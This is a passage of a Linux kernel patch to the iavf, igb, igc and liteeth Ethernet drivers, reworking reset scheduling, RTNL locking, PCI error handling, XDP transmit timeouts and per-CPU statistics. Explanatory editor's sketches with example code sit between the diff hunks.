+  * @adapter: board private structure
++ * @flags: IAVF_FLAG_RESET_PENDING or IAVF_FLAG_RESET_NEEDED
+  **/
+-void iavf_schedule_reset(struct iavf_adapter *adapter)
++void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags)
+ {
+-	if (!(adapter->flags &
+-	      (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED))) {
+-		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
++	if (!test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section) &&
++	    !(adapter->flags &
++	    (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED))) {
++		adapter->flags |= flags;
+ 		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ }
+@@ -303,7 +344,7 @@ static void iavf_tx_timeout(struct net_device *netdev, unsigned int txqueue)
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
+ 	adapter->tx_timeout_count++;
+-	iavf_schedule_reset(adapter);
++	iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
+ }
+ 
+ /**
+@@ -362,7 +403,7 @@ static void iavf_irq_disable(struct iavf_adapter *adapter)
+  * iavf_irq_enable_queues - Enable interrupt for all queues
+  * @adapter: board private structure
+  **/
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter)
++static void iavf_irq_enable_queues(struct iavf_adapter *adapter)
+ {
+ 	struct iavf_hw *hw = &adapter->hw;
+ 	int i;
+@@ -1003,8 +1044,8 @@ struct iavf_mac_filter *iavf_add_filter(struct iavf_adapter *adapter,
+  *
+  * Do not call this with mac_vlan_list_lock!
+  **/
+-int iavf_replace_primary_mac(struct iavf_adapter *adapter,
+-			     const u8 *new_mac)
++static int iavf_replace_primary_mac(struct iavf_adapter *adapter,
++				    const u8 *new_mac)
+ {
+ 	struct iavf_hw *hw = &adapter->hw;
+ 	struct iavf_mac_filter *f;
+@@ -1663,10 +1704,10 @@ static int iavf_set_interrupt_capability(struct iavf_adapter *adapter)
+ 		adapter->msix_entries[vector].entry = vector;
+ 
+ 	err = iavf_acquire_msix_vectors(adapter, v_budget);
++	if (!err)
++		iavf_schedule_finish_config(adapter);
+ 
+ out:
+-	netif_set_real_num_rx_queues(adapter->netdev, pairs);
+-	netif_set_real_num_tx_queues(adapter->netdev, pairs);
+ 	return err;
+ }
+ 
+@@ -1840,19 +1881,16 @@ static int iavf_alloc_q_vectors(struct iavf_adapter *adapter)
+ static void iavf_free_q_vectors(struct iavf_adapter *adapter)
+ {
+ 	int q_idx, num_q_vectors;
+-	int napi_vectors;
+ 
+ 	if (!adapter->q_vectors)
+ 		return;
+ 
+ 	num_q_vectors = adapter->num_msix_vectors - NONQ_VECS;
+-	napi_vectors = adapter->num_active_queues;
+ 
+ 	for (q_idx = 0; q_idx < num_q_vectors; q_idx++) {
+ 		struct iavf_q_vector *q_vector = &adapter->q_vectors[q_idx];
+ 
+-		if (q_idx < napi_vectors)
+-			netif_napi_del(&q_vector->napi);
++		netif_napi_del(&q_vector->napi);
+ 	}
+ 	kfree(adapter->q_vectors);
+ 	adapter->q_vectors = NULL;
+@@ -1863,7 +1901,7 @@ static void iavf_free_q_vectors(struct iavf_adapter *adapter)
+  * @adapter: board private structure
+  *
+  **/
+-void iavf_reset_interrupt_capability(struct iavf_adapter *adapter)
++static void iavf_reset_interrupt_capability(struct iavf_adapter *adapter)
+ {
+ 	if (!adapter->msix_entries)
+ 		return;
+@@ -1878,7 +1916,7 @@ void iavf_reset_interrupt_capability(struct iavf_adapter *adapter)
+  * @adapter: board private structure to initialize
+  *
+  **/
+-int iavf_init_interrupt_scheme(struct iavf_adapter *adapter)
++static int iavf_init_interrupt_scheme(struct iavf_adapter *adapter)
+ {
+ 	int err;
+ 
+@@ -1889,9 +1927,7 @@ int iavf_init_interrupt_scheme(struct iavf_adapter *adapter)
+ 		goto err_alloc_queues;
+ 	}
+ 
+-	rtnl_lock();
+ 	err = iavf_set_interrupt_capability(adapter);
+-	rtnl_unlock();
+ 	if (err) {
+ 		dev_err(&adapter->pdev->dev,
+ 			"Unable to setup interrupt capabilities\n");
+@@ -1944,15 +1980,16 @@ static void iavf_free_rss(struct iavf_adapter *adapter)
+ /**
+  * iavf_reinit_interrupt_scheme - Reallocate queues and vectors
+  * @adapter: board private structure
++ * @running: true if adapter->state == __IAVF_RUNNING
+  *
+  * Returns 0 on success, negative on failure
+  **/
+-static int iavf_reinit_interrupt_scheme(struct iavf_adapter *adapter)
++static int iavf_reinit_interrupt_scheme(struct iavf_adapter *adapter, bool running)
+ {
+ 	struct net_device *netdev = adapter->netdev;
+ 	int err;
+ 
+-	if (netif_running(netdev))
++	if (running)
+ 		iavf_free_traffic_irqs(adapter);
+ 	iavf_free_misc_irq(adapter);
+ 	iavf_reset_interrupt_capability(adapter);
+@@ -1976,6 +2013,78 @@ err:
+ 	return err;
+ }
+ 
++/**
++ * iavf_finish_config - do all netdev work that needs RTNL
++ * @work: our work_struct
++ *
++ * Do work that needs both RTNL and crit_lock.
++ **/
++static void iavf_finish_config(struct work_struct *work)
++{
++	struct iavf_adapter *adapter;
++	int pairs, err;
++
++	adapter = container_of(work, struct iavf_adapter, finish_config);
++
++	/* Always take RTNL first to prevent circular lock dependency */
++	rtnl_lock();
++	mutex_lock(&adapter->crit_lock);
++
++	if ((adapter->flags & IAVF_FLAG_SETUP_NETDEV_FEATURES) &&
++	    adapter->netdev_registered &&
++	    !test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section)) {
++		netdev_update_features(adapter->netdev);
++		adapter->flags &= ~IAVF_FLAG_SETUP_NETDEV_FEATURES;
++	}
++
++	switch (adapter->state) {
++	case __IAVF_DOWN:
++		if (!adapter->netdev_registered) {
++			err = register_netdevice(adapter->netdev);
++			if (err) {
++				dev_err(&adapter->pdev->dev, "Unable to register netdev (%d)\n",
++					err);
++
++				/* go back and try again.*/
++				iavf_free_rss(adapter);
++				iavf_free_misc_irq(adapter);
++				iavf_reset_interrupt_capability(adapter);
++				iavf_change_state(adapter,
++						  __IAVF_INIT_CONFIG_ADAPTER);
++				goto out;
++			}
++			adapter->netdev_registered = true;
++		}
++
++		/* Set the real number of queues when reset occurs while
++		 * state == __IAVF_DOWN
++		 */
++		fallthrough;
++	case __IAVF_RUNNING:
++		pairs = adapter->num_active_queues;
++		netif_set_real_num_rx_queues(adapter->netdev, pairs);
++		netif_set_real_num_tx_queues(adapter->netdev, pairs);
++		break;
++
++	default:
++		break;
++	}
++
++out:
++	mutex_unlock(&adapter->crit_lock);
++	rtnl_unlock();
++}
++
++/**
++ * iavf_schedule_finish_config - Set the flags and schedule a reset event
++ * @adapter: board private structure
++ **/
++void iavf_schedule_finish_config(struct iavf_adapter *adapter)
++{
++	if (!test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section))
++		queue_work(adapter->wq, &adapter->finish_config);
++}
++
+ /**
+  * iavf_process_aq_command - process aq_required flags
+  * and sends aq command
+@@ -2176,7 +2285,7 @@ static int iavf_process_aq_command(struct iavf_adapter *adapter)
+  * the watchdog if any changes are requested to expedite the request via
+  * virtchnl.
+  **/
+-void
++static void
+ iavf_set_vlan_offload_features(struct iavf_adapter *adapter,
+ 			       netdev_features_t prev_features,
+ 			       netdev_features_t features)
+@@ -2383,7 +2492,7 @@ int iavf_parse_vf_resource_msg(struct iavf_adapter *adapter)
+ 			adapter->vsi_res->num_queue_pairs);
+ 		adapter->flags |= IAVF_FLAG_REINIT_MSIX_NEEDED;
+ 		adapter->num_req_queues = adapter->vsi_res->num_queue_pairs;
+-		iavf_schedule_reset(adapter);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
+ 
+ 		return -EAGAIN;
+ 	}
+@@ -2613,22 +2722,8 @@ static void iavf_init_config_adapter(struct iavf_adapter *adapter)
+ 
+ 	netif_carrier_off(netdev);
+ 	adapter->link_up = false;
+-
+-	/* set the semaphore to prevent any callbacks after device registration
+-	 * up to time when state of driver will be set to __IAVF_DOWN
+-	 */
+-	rtnl_lock();
+-	if (!adapter->netdev_registered) {
+-		err = register_netdevice(netdev);
+-		if (err) {
+-			rtnl_unlock();
+-			goto err_register;
+-		}
+-	}
+-
+-	adapter->netdev_registered = true;
+-
+ 	netif_tx_stop_all_queues(netdev);
++
+ 	if (CLIENT_ALLOWED(adapter)) {
+ 		err = iavf_lan_add_device(adapter);
+ 		if (err)
+@@ -2641,7 +2736,6 @@ static void iavf_init_config_adapter(struct iavf_adapter *adapter)
+ 
+ 	iavf_change_state(adapter, __IAVF_DOWN);
+ 	set_bit(__IAVF_VSI_DOWN, adapter->vsi.state);
+-	rtnl_unlock();
+ 
+ 	iavf_misc_irq_enable(adapter);
+ 	wake_up(&adapter->down_waitqueue);
+@@ -2661,10 +2755,11 @@ static void iavf_init_config_adapter(struct iavf_adapter *adapter)
+ 		/* request initial VLAN offload settings */
+ 		iavf_set_vlan_offload_features(adapter, 0, netdev->features);
+ 
++	iavf_schedule_finish_config(adapter);
+ 	return;
++
+ err_mem:
+ 	iavf_free_rss(adapter);
+-err_register:
+ 	iavf_free_misc_irq(adapter);
+ err_sw_init:
+ 	iavf_reset_interrupt_capability(adapter);
+@@ -2694,14 +2789,6 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	if (adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)
+ 		iavf_change_state(adapter, __IAVF_COMM_FAILED);
+ 
+-	if (adapter->flags & IAVF_FLAG_RESET_NEEDED) {
+-		adapter->aq_required = 0;
+-		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+-		mutex_unlock(&adapter->crit_lock);
+-		queue_work(adapter->wq, &adapter->reset_task);
+-		return;
+-	}
+-
+ 	switch (adapter->state) {
+ 	case __IAVF_STARTUP:
+ 		iavf_startup(adapter);
+@@ -2829,11 +2916,10 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	/* check for hw reset */
+ 	reg_val = rd32(hw, IAVF_VF_ARQLEN1) & IAVF_VF_ARQLEN1_ARQENABLE_MASK;
+ 	if (!reg_val) {
+-		adapter->flags |= IAVF_FLAG_RESET_PENDING;
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		dev_err(&adapter->pdev->dev, "Hardware reset detected\n");
+-		queue_work(adapter->wq, &adapter->reset_task);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_PENDING);
+ 		mutex_unlock(&adapter->crit_lock);
+ 		queue_delayed_work(adapter->wq,
+ 				   &adapter->watchdog_task, HZ * 2);
+@@ -3059,7 +3145,7 @@ continue_reset:
+ 
+ 	if ((adapter->flags & IAVF_FLAG_REINIT_MSIX_NEEDED) ||
+ 	    (adapter->flags & IAVF_FLAG_REINIT_ITR_NEEDED)) {
+-		err = iavf_reinit_interrupt_scheme(adapter);
++		err = iavf_reinit_interrupt_scheme(adapter, running);
+ 		if (err)
+ 			goto reset_err;
+ 	}
+@@ -3154,6 +3240,7 @@ continue_reset:
+ 
+ 	adapter->flags &= ~IAVF_FLAG_REINIT_ITR_NEEDED;
+ 
++	wake_up(&adapter->reset_waitqueue);
+ 	mutex_unlock(&adapter->client_lock);
+ 	mutex_unlock(&adapter->crit_lock);
+ 
+@@ -3230,27 +3317,7 @@ static void iavf_adminq_task(struct work_struct *work)
+ 	} while (pending);
+ 	mutex_unlock(&adapter->crit_lock);
+ 
+-	if ((adapter->flags & IAVF_FLAG_SETUP_NETDEV_FEATURES)) {
+-		if (adapter->netdev_registered ||
+-		    !test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section)) {
+-			struct net_device *netdev = adapter->netdev;
+-
+-			rtnl_lock();
+-			netdev_update_features(netdev);
+-			rtnl_unlock();
+-			/* Request VLAN offload settings */
+-			if (VLAN_V2_ALLOWED(adapter))
+-				iavf_set_vlan_offload_features
+-					(adapter, 0, netdev->features);
+-
+-			iavf_set_queue_vlan_tag_loc(adapter);
+-		}
+-
+-		adapter->flags &= ~IAVF_FLAG_SETUP_NETDEV_FEATURES;
+-	}
+-	if ((adapter->flags &
+-	     (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED)) ||
+-	    adapter->state == __IAVF_RESETTING)
++	if (iavf_is_reset_in_progress(adapter))
+ 		goto freedom;
+ 
+ 	/* check for error indications */
+@@ -4336,6 +4403,7 @@ static int iavf_close(struct net_device *netdev)
+ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
++	int ret = 0;
+ 
+ 	netdev_dbg(netdev, "changing MTU from %d to %d\n",
+ 		   netdev->mtu, new_mtu);
+@@ -4346,11 +4414,15 @@ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ 	}
+ 
+ 	if (netif_running(netdev)) {
+-		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(adapter->wq, &adapter->reset_task);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
++		ret = iavf_wait_for_reset(adapter);
++		if (ret < 0)
++			netdev_warn(netdev, "MTU change interrupted waiting for reset");
++		else if (ret)
++			netdev_warn(netdev, "MTU change timed out waiting for reset");
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ #define NETIF_VLAN_OFFLOAD_FEATURES	(NETIF_F_HW_VLAN_CTAG_RX | \
+@@ -4945,6 +5017,7 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	INIT_WORK(&adapter->reset_task, iavf_reset_task);
+ 	INIT_WORK(&adapter->adminq_task, iavf_adminq_task);
++	INIT_WORK(&adapter->finish_config, iavf_finish_config);
+ 	INIT_DELAYED_WORK(&adapter->watchdog_task, iavf_watchdog_task);
+ 	INIT_DELAYED_WORK(&adapter->client_task, iavf_client_task);
+ 	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+@@ -4953,6 +5026,9 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* Setup the wait queue for indicating transition to down status */
+ 	init_waitqueue_head(&adapter->down_waitqueue);
+ 
++	/* Setup the wait queue for indicating transition to running state */
++	init_waitqueue_head(&adapter->reset_waitqueue);
++
+ 	/* Setup the wait queue for indicating virtchannel events */
+ 	init_waitqueue_head(&adapter->vc_waitqueue);
+ 
+@@ -5085,13 +5161,15 @@ static void iavf_remove(struct pci_dev *pdev)
+ 		usleep_range(500, 1000);
+ 	}
+ 	cancel_delayed_work_sync(&adapter->watchdog_task);
++	cancel_work_sync(&adapter->finish_config);
+ 
++	rtnl_lock();
+ 	if (adapter->netdev_registered) {
+-		rtnl_lock();
+ 		unregister_netdevice(netdev);
+ 		adapter->netdev_registered = false;
+-		rtnl_unlock();
+ 	}
++	rtnl_unlock();
++
+ 	if (CLIENT_ALLOWED(adapter)) {
+ 		err = iavf_lan_del_device(adapter);
+ 		if (err)
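[Editor's sketch] The iavf hunks above replace fire-and-forget reset scheduling with a schedule-then-wait model: the MTU path queues a reset and then blocks on a dedicated reset_waitqueue, which the reset task and the VIRTCHNL_OP_ENABLE_QUEUES completion wake. A minimal sketch of that idiom follows; the struct and helper names are hypothetical, not the driver's actual implementation.

#include <linux/wait.h>
#include <linux/jiffies.h>

struct example_adapter {
	wait_queue_head_t reset_waitqueue;
	bool reset_in_progress;
};

/* Hypothetical helper illustrating the schedule-then-wait idiom. */
static int example_wait_for_reset(struct example_adapter *ad)
{
	/* wait_event_interruptible_timeout() returns >0 when the
	 * condition became true, 0 on timeout, <0 if interrupted.
	 */
	long ret = wait_event_interruptible_timeout(ad->reset_waitqueue,
						    !ad->reset_in_progress,
						    msecs_to_jiffies(5000));
	if (ret < 0)
		return -EINTR;	/* signal arrived while waiting */
	if (!ret)
		return -EBUSY;	/* reset did not finish in time */
	return 0;
}

The payoff is visible in iavf_change_mtu() above: the caller can now report whether the reset it triggered actually completed, instead of returning success unconditionally.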
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.c b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+index e989feda133c1..8c5f6096b0022 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+@@ -54,7 +54,7 @@ static void iavf_unmap_and_free_tx_resource(struct iavf_ring *ring,
+  * iavf_clean_tx_ring - Free any empty Tx buffers
+  * @tx_ring: ring to be cleaned
+  **/
+-void iavf_clean_tx_ring(struct iavf_ring *tx_ring)
++static void iavf_clean_tx_ring(struct iavf_ring *tx_ring)
+ {
+ 	unsigned long bi_size;
+ 	u16 i;
+@@ -110,7 +110,7 @@ void iavf_free_tx_resources(struct iavf_ring *tx_ring)
+  * Since there is no access to the ring head register
+  * in XL710, we need to use our local copies
+  **/
+-u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw)
++static u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw)
+ {
+ 	u32 head, tail;
+ 
+@@ -127,6 +127,24 @@ u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw)
+ 	return 0;
+ }
+ 
++/**
++ * iavf_force_wb - Issue SW Interrupt so HW does a wb
++ * @vsi: the VSI we care about
++ * @q_vector: the vector on which to force writeback
++ **/
++static void iavf_force_wb(struct iavf_vsi *vsi, struct iavf_q_vector *q_vector)
++{
++	u32 val = IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
++		  IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK | /* set noitr */
++		  IAVF_VFINT_DYN_CTLN1_SWINT_TRIG_MASK |
++		  IAVF_VFINT_DYN_CTLN1_SW_ITR_INDX_ENA_MASK
++		  /* allow 00 to be written to the index */;
++
++	wr32(&vsi->back->hw,
++	     IAVF_VFINT_DYN_CTLN1(q_vector->reg_idx),
++	     val);
++}
++
+ /**
+  * iavf_detect_recover_hung - Function to detect and recover hung_queues
+  * @vsi:  pointer to vsi struct with tx queues
+@@ -352,25 +370,6 @@ static void iavf_enable_wb_on_itr(struct iavf_vsi *vsi,
+ 	q_vector->arm_wb_state = true;
+ }
+ 
+-/**
+- * iavf_force_wb - Issue SW Interrupt so HW does a wb
+- * @vsi: the VSI we care about
+- * @q_vector: the vector  on which to force writeback
+- *
+- **/
+-void iavf_force_wb(struct iavf_vsi *vsi, struct iavf_q_vector *q_vector)
+-{
+-	u32 val = IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
+-		  IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK | /* set noitr */
+-		  IAVF_VFINT_DYN_CTLN1_SWINT_TRIG_MASK |
+-		  IAVF_VFINT_DYN_CTLN1_SW_ITR_INDX_ENA_MASK
+-		  /* allow 00 to be written to the index */;
+-
+-	wr32(&vsi->back->hw,
+-	     IAVF_VFINT_DYN_CTLN1(q_vector->reg_idx),
+-	     val);
+-}
+-
+ static inline bool iavf_container_is_rx(struct iavf_q_vector *q_vector,
+ 					struct iavf_ring_container *rc)
+ {
+@@ -687,7 +686,7 @@ err:
+  * iavf_clean_rx_ring - Free Rx buffers
+  * @rx_ring: ring to be cleaned
+  **/
+-void iavf_clean_rx_ring(struct iavf_ring *rx_ring)
++static void iavf_clean_rx_ring(struct iavf_ring *rx_ring)
+ {
+ 	unsigned long bi_size;
+ 	u16 i;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.h b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+index 2624bf6d009e3..7e6ee32d19b69 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+@@ -442,15 +442,11 @@ static inline unsigned int iavf_rx_pg_order(struct iavf_ring *ring)
+ 
+ bool iavf_alloc_rx_buffers(struct iavf_ring *rxr, u16 cleaned_count);
+ netdev_tx_t iavf_xmit_frame(struct sk_buff *skb, struct net_device *netdev);
+-void iavf_clean_tx_ring(struct iavf_ring *tx_ring);
+-void iavf_clean_rx_ring(struct iavf_ring *rx_ring);
+ int iavf_setup_tx_descriptors(struct iavf_ring *tx_ring);
+ int iavf_setup_rx_descriptors(struct iavf_ring *rx_ring);
+ void iavf_free_tx_resources(struct iavf_ring *tx_ring);
+ void iavf_free_rx_resources(struct iavf_ring *rx_ring);
+ int iavf_napi_poll(struct napi_struct *napi, int budget);
+-void iavf_force_wb(struct iavf_vsi *vsi, struct iavf_q_vector *q_vector);
+-u32 iavf_get_tx_pending(struct iavf_ring *ring, bool in_sw);
+ void iavf_detect_recover_hung(struct iavf_vsi *vsi);
+ int __iavf_maybe_stop_tx(struct iavf_ring *tx_ring, int size);
+ bool __iavf_chk_linearize(struct sk_buff *skb);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 00dccdd290dce..2fc8e60ef6afb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -1961,9 +1961,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		case VIRTCHNL_EVENT_RESET_IMPENDING:
+ 			dev_info(&adapter->pdev->dev, "Reset indication received from the PF\n");
+ 			if (!(adapter->flags & IAVF_FLAG_RESET_PENDING)) {
+-				adapter->flags |= IAVF_FLAG_RESET_PENDING;
+ 				dev_info(&adapter->pdev->dev, "Scheduling reset task\n");
+-				queue_work(adapter->wq, &adapter->reset_task);
++				iavf_schedule_reset(adapter, IAVF_FLAG_RESET_PENDING);
+ 			}
+ 			break;
+ 		default:
+@@ -2237,6 +2236,10 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		iavf_process_config(adapter);
+ 		adapter->flags |= IAVF_FLAG_SETUP_NETDEV_FEATURES;
++		iavf_schedule_finish_config(adapter);
++
++		iavf_set_queue_vlan_tag_loc(adapter);
++
+ 		was_mac_changed = !ether_addr_equal(netdev->dev_addr,
+ 						    adapter->hw.mac.addr);
+ 
+@@ -2282,6 +2285,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 	case VIRTCHNL_OP_ENABLE_QUEUES:
+ 		/* enable transmits */
+ 		iavf_irq_enable(adapter, true);
++		wake_up(&adapter->reset_waitqueue);
+ 		adapter->flags &= ~IAVF_FLAG_QUEUES_DISABLED;
+ 		break;
+ 	case VIRTCHNL_OP_DISABLE_QUEUES:
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 18ffbc892f86c..3e0444354632d 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -9585,6 +9585,11 @@ static pci_ers_result_t igb_io_error_detected(struct pci_dev *pdev,
+ 	struct net_device *netdev = pci_get_drvdata(pdev);
+ 	struct igb_adapter *adapter = netdev_priv(netdev);
+ 
++	if (state == pci_channel_io_normal) {
++		dev_warn(&pdev->dev, "Non-correctable non-fatal error reported.\n");
++		return PCI_ERS_RESULT_CAN_RECOVER;
++	}
++
+ 	netif_device_detach(netdev);
+ 
+ 	if (state == pci_channel_io_perm_failure)
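[Editor's sketch] The igb hunk adds an early return for pci_channel_io_normal, so non-fatal AER reports no longer detach the netdev. An .error_detected callback then becomes a three-way triage on the channel state; a sketch of that shape, with generic names and the standard PCI error-recovery result codes:

#include <linux/pci.h>
#include <linux/netdevice.h>

static pci_ers_result_t example_io_error_detected(struct pci_dev *pdev,
						  pci_channel_state_t state)
{
	struct net_device *netdev = pci_get_drvdata(pdev);

	/* Link still usable: let AER try to recover in place. */
	if (state == pci_channel_io_normal)
		return PCI_ERS_RESULT_CAN_RECOVER;

	netif_device_detach(netdev);

	/* Device is gone for good: ask the core to unplug it. */
	if (state == pci_channel_io_perm_failure)
		return PCI_ERS_RESULT_DISCONNECT;

	/* pci_channel_io_frozen: request a slot reset. */
	pci_disable_device(pdev);
	return PCI_ERS_RESULT_NEED_RESET;
}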
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 273941f90f066..2e091a4a065e7 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -2402,6 +2402,8 @@ static int igc_xdp_xmit_back(struct igc_adapter *adapter, struct xdp_buff *xdp)
+ 	nq = txring_txq(ring);
+ 
+ 	__netif_tx_lock(nq, cpu);
++	/* Avoid transmit queue timeout since we share it with the slow path */
++	txq_trans_cond_update(nq);
+ 	res = igc_xdp_init_tx_descriptor(ring, xdpf);
+ 	__netif_tx_unlock(nq);
+ 	return res;
+@@ -2795,15 +2797,18 @@ static void igc_xdp_xmit_zc(struct igc_ring *ring)
+ 	struct netdev_queue *nq = txring_txq(ring);
+ 	union igc_adv_tx_desc *tx_desc = NULL;
+ 	int cpu = smp_processor_id();
+-	u16 ntu = ring->next_to_use;
+ 	struct xdp_desc xdp_desc;
+-	u16 budget;
++	u16 budget, ntu;
+ 
+ 	if (!netif_carrier_ok(ring->netdev))
+ 		return;
+ 
+ 	__netif_tx_lock(nq, cpu);
+ 
++	/* Avoid transmit queue timeout since we share it with the slow path */
++	txq_trans_cond_update(nq);
++
++	ntu = ring->next_to_use;
+ 	budget = igc_desc_unused(ring);
+ 
+ 	while (xsk_tx_peek_desc(pool, &xdp_desc) && budget--) {
+@@ -6297,6 +6302,9 @@ static int igc_xdp_xmit(struct net_device *dev, int num_frames,
+ 
+ 	__netif_tx_lock(nq, cpu);
+ 
++	/* Avoid transmit queue timeout since we share it with the slow path */
++	txq_trans_cond_update(nq);
++
+ 	drops = 0;
+ 	for (i = 0; i < num_frames; i++) {
+ 		int err;
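[Editor's sketch] All three igc hunks insert txq_trans_cond_update() immediately after taking the Tx queue lock. XDP transmits bypass ndo_start_xmit(), so the queue's trans_start timestamp would otherwise go stale and trip the netdev watchdog even though the shared ring is busy. The locking pattern, with placeholder names:

#include <linux/netdevice.h>
#include <linux/smp.h>

static void example_xdp_xmit_locked(struct netdev_queue *nq)
{
	int cpu = smp_processor_id();

	__netif_tx_lock(nq, cpu);

	/* Refresh trans_start if it is stale, so the watchdog does
	 * not fire just because the slow path has been idle while
	 * XDP kept the shared queue busy.
	 */
	txq_trans_cond_update(nq);

	/* ... post descriptors to the shared hardware ring ... */

	__netif_tx_unlock(nq);
}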
+diff --git a/drivers/net/ethernet/litex/litex_liteeth.c b/drivers/net/ethernet/litex/litex_liteeth.c
+index 35f24e0f09349..ffa96059079c6 100644
+--- a/drivers/net/ethernet/litex/litex_liteeth.c
++++ b/drivers/net/ethernet/litex/litex_liteeth.c
+@@ -78,8 +78,7 @@ static int liteeth_rx(struct net_device *netdev)
+ 	memcpy_fromio(data, priv->rx_base + rx_slot * priv->slot_size, len);
+ 	skb->protocol = eth_type_trans(skb, netdev);
+ 
+-	netdev->stats.rx_packets++;
+-	netdev->stats.rx_bytes += len;
++	dev_sw_netstats_rx_add(netdev, len);
+ 
+ 	return netif_rx(skb);
+ 
+@@ -185,8 +184,7 @@ static netdev_tx_t liteeth_start_xmit(struct sk_buff *skb,
+ 	litex_write16(priv->base + LITEETH_READER_LENGTH, skb->len);
+ 	litex_write8(priv->base + LITEETH_READER_START, 1);
+ 
+-	netdev->stats.tx_bytes += skb->len;
+-	netdev->stats.tx_packets++;
++	dev_sw_netstats_tx_add(netdev, 1, skb->len);
+ 
+ 	priv->tx_slot = (priv->tx_slot + 1) % priv->num_tx_slots;
+ 	dev_kfree_skb_any(skb);
+@@ -194,9 +192,17 @@ static netdev_tx_t liteeth_start_xmit(struct sk_buff *skb,
+ 	return NETDEV_TX_OK;
+ }
+ 
++static void
++liteeth_get_stats64(struct net_device *netdev, struct rtnl_link_stats64 *stats)
++{
++	netdev_stats_to_stats64(stats, &netdev->stats);
++	dev_fetch_sw_netstats(stats, netdev->tstats);
++}
++
+ static const struct net_device_ops liteeth_netdev_ops = {
+ 	.ndo_open		= liteeth_open,
+ 	.ndo_stop		= liteeth_stop,
++	.ndo_get_stats64	= liteeth_get_stats64,
+ 	.ndo_start_xmit         = liteeth_start_xmit,
+ };
+ 
+@@ -242,6 +248,11 @@ static int liteeth_probe(struct platform_device *pdev)
+ 	priv->netdev = netdev;
+ 	priv->dev = &pdev->dev;
+ 
++	netdev->tstats = devm_netdev_alloc_pcpu_stats(&pdev->dev,
++						      struct pcpu_sw_netstats);
++	if (!netdev->tstats)
++		return -ENOMEM;
++
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+ 		return irq;
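[Editor's sketch] The liteeth change moves from the shared netdev->stats counters to lockless per-CPU counters, following the usual recipe shown in the hunks: allocate pcpu_sw_netstats at probe, bump it with dev_sw_netstats_rx_add()/dev_sw_netstats_tx_add() on the hot paths, and fold it back in .ndo_get_stats64. The wiring, condensed with placeholder function names:

#include <linux/device.h>
#include <linux/netdevice.h>
#include <linux/u64_stats_sync.h>

static int example_probe_stats(struct device *dev, struct net_device *netdev)
{
	/* One pcpu_sw_netstats instance per CPU, freed with the device. */
	netdev->tstats = devm_netdev_alloc_pcpu_stats(dev,
						      struct pcpu_sw_netstats);
	return netdev->tstats ? 0 : -ENOMEM;
}

/* RX path: dev_sw_netstats_rx_add(netdev, len);
 * TX path: dev_sw_netstats_tx_add(netdev, 1, skb->len);
 */

static void example_get_stats64(struct net_device *netdev,
				struct rtnl_link_stats64 *stats)
{
	netdev_stats_to_stats64(stats, &netdev->stats);
	dev_fetch_sw_netstats(stats, netdev->tstats);
}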
